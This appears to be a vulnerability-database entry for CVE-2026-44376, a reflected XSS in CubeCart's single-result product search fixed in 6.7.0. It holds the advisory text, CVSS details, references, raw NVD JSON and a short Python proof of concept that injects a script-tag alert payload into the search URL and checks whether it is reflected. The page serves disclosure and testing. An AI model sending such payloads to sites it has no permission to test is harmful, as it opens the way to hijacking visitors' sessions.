CVE-2026-44376

Description

CubeCart is an ecommerce software solution. Prior to 6.7.0, an unauthenticated Reflected XSS vulnerability exists in the CubeCart v6.x search feature. Due to a logic flaw in classes/catalogue.class.php, user input is reflected without sanitization only when a search returns exactly one product. This flaw bypasses current filters, allowing an attacker to execute malicious JavaScript in the victim's browser, leading to session hijacking, site defacement, or phishing. This vulnerability is fixed in 6.7.0.

CVSS Details

CVSS Score

6.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

CubeCart v6.x < 6.7.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# Proof of Concept for CVE-2026-44376
# Reflected XSS in CubeCart Search (Single Result)

import requests

def check_poc(target_url, search_term):
    # Payload to inject
    xss_payload = "<script>alert('CVE-2026-44376');</script>"
    
    # Construct the search URL
    # Note: The search parameter name might vary (e.g., 'search', 'q')
    exploit_url = f"{target_url}/index.php?_a=search&search_query={xss_payload}"
    
    try:
        response = requests.get(exploit_url)
        
        # Check if payload is reflected in the response (unfiltered)
        if xss_payload in response.text:
            print(f"[+] Potential XSS found if search returns exactly 1 result.")
            print(f"[+] URL: {exploit_url}")
        else:
            print("[-] Payload not reflected or filtered.")
            
    except Exception as e:
        print(f"Error: {e}")

# Example usage
# check_poc("http://target-cubecart-site.com", "product_name")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-44376
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-44376
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-44376/
[4] VulDB https://vuldb.com/cve/CVE-2026-44376
[5] https://github.com/cubecart/v6/commit/b9d03e20b9d0f443f8ea55fd834e348438e2cc0c
[6] https://github.com/cubecart/v6/security/advisories/GHSA-gvcp-wpvp-c6f7

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-44376", "sourceIdentifier": "[email protected]", "published": "2026-05-13T21:16:48.183", "lastModified": "2026-05-14T16:49:18.583", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "CubeCart is an ecommerce software solution. Prior to 6.7.0, an unauthenticated Reflected XSS vulnerability exists in the CubeCart v6.x search feature. Due to a logic flaw in classes/catalogue.class.php, user input is reflected without sanitization only when a search returns exactly one product. This flaw bypasses current filters, allowing an attacker to execute malicious JavaScript in the victim's browser, leading to session hijacking, site defacement, or phishing. This vulnerability is fixed in 6.7.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://github.com/cubecart/v6/commit/b9d03e20b9d0f443f8ea55fd834e348438e2cc0c", "source": "[email protected]"}, {"url": "https://github.com/cubecart/v6/security/advisories/GHSA-gvcp-wpvp-c6f7", "source": "[email protected]"}]}}